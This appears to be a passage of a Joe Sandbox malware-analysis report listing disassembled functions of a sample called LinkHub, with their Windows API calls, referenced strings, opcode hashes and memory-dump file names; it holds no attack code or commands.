Opcode ID: 94dbf4ab783542dcbf69364a032a92fe27196c5cf8e4543af7f2b5300c8685f2
Instruction ID: a4cf9b022354c482d95d055b573f49a20a7a71c33b80e5e59cd41bfa91cadf95
Opcode Fuzzy Hash: 94dbf4ab783542dcbf69364a032a92fe27196c5cf8e4543af7f2b5300c8685f2
Instruction Fuzzy Hash: 64114872A04219BFCB119BAD9C09A9F7FADAB07320F004219F911F33D0C2B4D9088760

Function 00DFD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00DFD369,00000000,00000004,00000000), ref: 00DFD588
GetLastError.KERNEL32 ref: 00DFD594
__dosmaperr.LIBCMT ref: 00DFD59B
ResumeThread.KERNEL32(00000000), ref: 00DFD5B9

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: ffcc9d14dc4dedd2747dc8ac67d1b661b2713d556fc388df70adb42f4c5ade4c
Instruction ID: 2528fcd5977c38515fa5dae13f014dbcf16cecc449215b1fe89f36620359178d
Opcode Fuzzy Hash: ffcc9d14dc4dedd2747dc8ac67d1b661b2713d556fc388df70adb42f4c5ade4c
Instruction Fuzzy Hash: D401C8325041187BCB116F66EC05BBA7B6BEF42734F168215F625962D0CB708904C6B1

Function 00DD7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DD78B1
GetStockObject.GDI32(00000011), ref: 00DD78C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD78CF

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 1c1a6602284677019806e5143180e8aff02aa9774f41940355c29684098da429
Instruction ID: 483a35cc0a043b339103842fc2b7b8443014261bb32f8984e92034cc768de3ee
Opcode Fuzzy Hash: 1c1a6602284677019806e5143180e8aff02aa9774f41940355c29684098da429
Instruction Fuzzy Hash: 72118B72A05108BFDF065F959C58EEA7B69FF083A4F040116FA0062220E772DC60FBA1

Function 00E033E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E411D9,00000000,00000000,?,00E0338D,00E411D9,00000000,00000000,00000000,?,00E035FE,00000006,FlsSetValue), ref: 00E03418
GetLastError.KERNEL32(?,00E0338D,00E411D9,00000000,00000000,00000000,?,00E035FE,00000006,FlsSetValue,00E73260,FlsSetValue,00000000,00000364,?,00E031B9), ref: 00E03424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E0338D,00E411D9,00000000,00000000,00000000,?,00E035FE,00000006,FlsSetValue,00E73260,FlsSetValue,00000000), ref: 00E03432

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5c937eb614d1ace41ae0087e4db01131c218e336895029234e2806239d025ce2
Instruction ID: 480728bf53feca4ade6985e446a72a070d7082753ed2025359723093c21da9bf
Opcode Fuzzy Hash: 5c937eb614d1ace41ae0087e4db01131c218e336895029234e2806239d025ce2
Instruction Fuzzy Hash: 8B01D832B152229FC7224B7AAC449577B5CEF05BA57510224F916FB1C1D721DD85C6E0

Function 00E3BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E3B69A,?,00008000), ref: 00E3BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E3B69A,?,00008000), ref: 00E3BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E3B69A,?,00008000), ref: 00E3BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E3B69A,?,00008000), ref: 00E3BAED

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 10856f9081a16fe15457ea6683565f9f5701fca36936a06d25f50e3e029445e3
Instruction ID: 5b84ba312492bc04ebd315cee4b8ae9c93926ac260cbe20f6d30815d4bb8c685
Opcode Fuzzy Hash: 10856f9081a16fe15457ea6683565f9f5701fca36936a06d25f50e3e029445e3
Instruction Fuzzy Hash: E1117930D05A2DEBCF00AFA6E9486EEBF78FF09710F104085DA42B2140CBB08654CBA1

Function 00E6886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E6888E
ScreenToClient.USER32(?,?), ref: 00E688A6
ScreenToClient.USER32(?,?), ref: 00E688CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E688E5

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 85212d3581cfdaa76f2b0b3d2bebbda58a2f3c6bddec33a086a439b0c4599a4b
Instruction ID: ede06fb1f1ecbd6fdedf4b2977ab29db0fd3aab3daf34b4617a3ce0660b55923
Opcode Fuzzy Hash: 85212d3581cfdaa76f2b0b3d2bebbda58a2f3c6bddec33a086a439b0c4599a4b
Instruction Fuzzy Hash: 9A1160B9D0020AAFDB01CFA9D884AEEBBB5FB08354F508166E915E3220D775AA54CF50

Function 00E336F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E33712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E33723
GetCurrentThreadId.KERNEL32 ref: 00E3372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E33731

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 68e50cec8aebad69baab273472e6ceaed47f9d74619ae0fcfe7cc8a4597e3739
Instruction ID: 6bea9f24ef1f1e99aba42348f3e6232e27d43454aa28afbaa3959a1a728333ec
Opcode Fuzzy Hash: 68e50cec8aebad69baab273472e6ceaed47f9d74619ae0fcfe7cc8a4597e3739
Instruction Fuzzy Hash: 89E06DF1A062247ADA2017A3AC4DEEB7F6CDB42BE1F800016F105F2090DAE4C944C6B1

Function 00E692BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00DD1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DD1F87
Part of subcall function 00DD1F2D: SelectObject.GDI32(?,00000000), ref: 00DD1F96
Part of subcall function 00DD1F2D: BeginPath.GDI32(?), ref: 00DD1FAD
Part of subcall function 00DD1F2D: SelectObject.GDI32(?,00000000), ref: 00DD1FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E692E3
LineTo.GDI32(?,?,?), ref: 00E692F0
EndPath.GDI32(?), ref: 00E69300
StrokePath.GDI32(?), ref: 00E6930E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: fe6e20cd17799a417ece7d8956e02fe59ddcc94b71db970d505c5e89a8b1101a
Instruction ID: 17f1e37bf66df9f85ff0056027daefebefa7f2e31bed2fc13b81c85077d6163e
Opcode Fuzzy Hash: fe6e20cd17799a417ece7d8956e02fe59ddcc94b71db970d505c5e89a8b1101a
Instruction Fuzzy Hash: 7DF0BE3214A218BEDB121F55BC0EFCF3F5AAF0E360F008000FA11711E2C3B455298BA5

Function 00DD21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00DD21BC
SetTextColor.GDI32(?,?), ref: 00DD21C6
SetBkMode.GDI32(?,00000001), ref: 00DD21D9
GetStockObject.GDI32(00000005), ref: 00DD21E1

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 0311f885cf084a0f4adc617527ebbc4f7ed8dfdf666881429f7c91981b975618
Instruction ID: 692b2214712a1a7aa0e0ebf24febf9bc58287369afd2a621610fd3eac965a281
Opcode Fuzzy Hash: 0311f885cf084a0f4adc617527ebbc4f7ed8dfdf666881429f7c91981b975618
Instruction Fuzzy Hash: C9E06531744240AEDB215B76BC0D7E93B11AB12375F048319F7B6640E0C7F186889B10

Function 00E2EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E2EC36
GetDC.USER32(00000000), ref: 00E2EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E2EC60
ReleaseDC.USER32(?), ref: 00E2EC81

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 8efac90befa038cf3c1c409b088eec5b60e4a6d6d824e54640f88096f294168f
Instruction ID: 125dfad9625027ae8b043939ddffa47359a27a3ee52ed4a54cbe6e4a182e87e4
Opcode Fuzzy Hash: 8efac90befa038cf3c1c409b088eec5b60e4a6d6d824e54640f88096f294168f
Instruction Fuzzy Hash: 5FE01AB0D04204DFCB41AFA2ED08A5EBBB1EB08350F508409E84AF3350C7B899059F11

Function 00E2EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E2EC4A
GetDC.USER32(00000000), ref: 00E2EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E2EC60
ReleaseDC.USER32(?), ref: 00E2EC81

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 8412c7bc98fadfc9fd861f36e685612e56bd2bb5a56aa868ea06101772a59ac6
Instruction ID: 77506c2e126045186db1803f37c62bffc040d159596a504f323a1134b8dc7285
Opcode Fuzzy Hash: 8412c7bc98fadfc9fd861f36e685612e56bd2bb5a56aa868ea06101772a59ac6
Instruction Fuzzy Hash: BAE01AB0D04204DFCB51AFA2EC08A5EBBB1EB08350B508409E849F3250C7B899059F10

Function 00E23616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

bn, xrefs: 00E23631, 00E238EA, 00E23903, 00E23B3F, 00E23B58
@COM_EVENTOBJ, xrefs: 00E23AD6

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LoadString
String ID: @COM_EVENTOBJ$bn
API String ID: 2948472770-192135924
Opcode ID: a60baa0b724b1d74ad1a3676b023d0d948617c3e1359725a6f7c167d3902b28f
Instruction ID: 2977f77e618130990b7eed17376099ee04a9856b01cb5f13e3889bc444bb95b1
Opcode Fuzzy Hash: a60baa0b724b1d74ad1a3676b023d0d948617c3e1359725a6f7c167d3902b28f
Instruction Fuzzy Hash: 2AF1BF70A083148FD728DF24D841B6AB7E1FF84308F14991DF58AAB2A1C775EA45CF92

Function 00E585DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00DF05B2: EnterCriticalSection.KERNEL32(00EA170C,?,00000000,?,00DDD22A,00EA3570,00000001,00000000,?,?,00E4F023,?,?,00000000,00000001,?), ref: 00DF05BD
Part of subcall function 00DF05B2: LeaveCriticalSection.KERNEL32(00EA170C,?,00DDD22A,00EA3570,00000001,00000000,?,?,00E4F023,?,?,00000000,00000001,?,00000001,00EA2430), ref: 00DF05FA

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00DF0413: __onexit.LIBCMT ref: 00DF0419

__Init_thread_footer.LIBCMT ref: 00E58658

Part of subcall function 00DF0568: EnterCriticalSection.KERNEL32(00EA170C,00000000,?,00DDD258,00EA3570,00E127C9,00000001,00000000,?,?,00E4F023,?,?,00000000,00000001,?), ref: 00DF0572
Part of subcall function 00DF0568: LeaveCriticalSection.KERNEL32(00EA170C,?,00DDD258,00EA3570,00E127C9,00000001,00000000,?,?,00E4F023,?,?,00000000,00000001,?,00000001), ref: 00DF05A5

Strings

Variable must be of type 'Object'., xrefs: 00E58697
bn, xrefs: 00E585E5, 00E5887F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: Variable must be of type 'Object'.$bn
API String ID: 535116098-2837176596
Opcode ID: 82bccfa03c5222c969effe44640cd92ef4f5833e1b55fcc93b910e94f724be62
Instruction ID: f17be90e7d8c74b8098f6194657e4df0c2d64794da7b3fd4e9d81fdce1ae4f29
Opcode Fuzzy Hash: 82bccfa03c5222c969effe44640cd92ef4f5833e1b55fcc93b910e94f724be62
Instruction Fuzzy Hash: 68916D74A00208EFCB04EF54D991DADB7B1EF49305F50985AF906BB392DB71AE49CB60

Function 00E457CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD41EA: _wcslen.LIBCMT ref: 00DD41EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00E45919

Strings

LPT, xrefs: 00E45840
*, xrefs: 00E45855

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 16e287a7e68bbad7fade95cc12a541b5b7d4c47a414953aeb0dd7b0187bdc9f7
Instruction ID: 1bebe38e5fa9aff688e379212d5a5834aac80aeb49f5d6226e9621aad5179fa9
Opcode Fuzzy Hash: 16e287a7e68bbad7fade95cc12a541b5b7d4c47a414953aeb0dd7b0187bdc9f7
Instruction Fuzzy Hash: 1A917F76A00604DFCB14DF54D494EAABBF1EF48318F199099E849AF352C731EE85CBA0

Function 00E35703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00E358AF

Strings

Container, xrefs: 00E3581E
0$, xrefs: 00E35952

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ContainedObject
String ID: 0$$Container
API String ID: 3565006973-836522788
Opcode ID: 3cefef4ba6ec5b591b586ddbdff2b7a118329ad17eab59cc0e6628e4d93ca546
Instruction ID: be48002f941c49a90fd1133957d9ee926de2f3de9fcde6425ffc50351646e4ec
Opcode Fuzzy Hash: 3cefef4ba6ec5b591b586ddbdff2b7a118329ad17eab59cc0e6628e4d93ca546
Instruction Fuzzy Hash: 50814871200601EFDB14DF58C888B6ABBF4FF49714F10856EF95AAB391DBB0A845CB60

Function 00DFE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00DFE67D

Strings

pow, xrefs: 00DFE655, 00DFE672

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: baf2cf6afe7a32a6f28a095362facd874d9d4431b32151f7d533b5d66ca20928
Instruction ID: 65ec1e2ac9da0e8e6ca3652dea48b9c7410e849d0be26ba9cff4f16013df2887
Opcode Fuzzy Hash: baf2cf6afe7a32a6f28a095362facd874d9d4431b32151f7d533b5d66ca20928
Instruction Fuzzy Hash: A051CC70E0A10A8AC715BB14CE013BA2BE4EF10B40F35DD19F1D5A62F9EF358DC5AA56

Function 00DEA8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00DEA916

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 3358d636df43506286829d6f826cd09d152c06a02cf86b4188a7ab61fb2e5153
Instruction ID: 91278fc609691b634c0a26bf216224778ae2166fa9e177491b665a97f93e97c3
Opcode Fuzzy Hash: 3358d636df43506286829d6f826cd09d152c06a02cf86b4188a7ab61fb2e5153
Instruction Fuzzy Hash: 72516731506297CFDB25EF28E440ABA7BA0EF15314F644056F8A1AB2D1DB34ED42CB71

Function 00DEF6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00DEF6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00DEF6F4

Strings

@, xrefs: 00DEF6E8

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 690173ad1fb9f6e098a8f81e9611a647ea62c456778f71df7685666b0c27f3ba
Instruction ID: f2cde4f0e6f12254cbe0a82437b6c6b07521d0a268be91c67e561688587b2524
Opcode Fuzzy Hash: 690173ad1fb9f6e098a8f81e9611a647ea62c456778f71df7685666b0c27f3ba
Instruction Fuzzy Hash: 455137718087489FD320AF51DC86BABBBE8FB95304F81885EF1D9512A1DB708529CB76

Function 00E022A1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E02377

Strings

Y,, xrefs: 00E022D0, 00E02376
Y,, xrefs: 00E022A3

Memory Dump Source

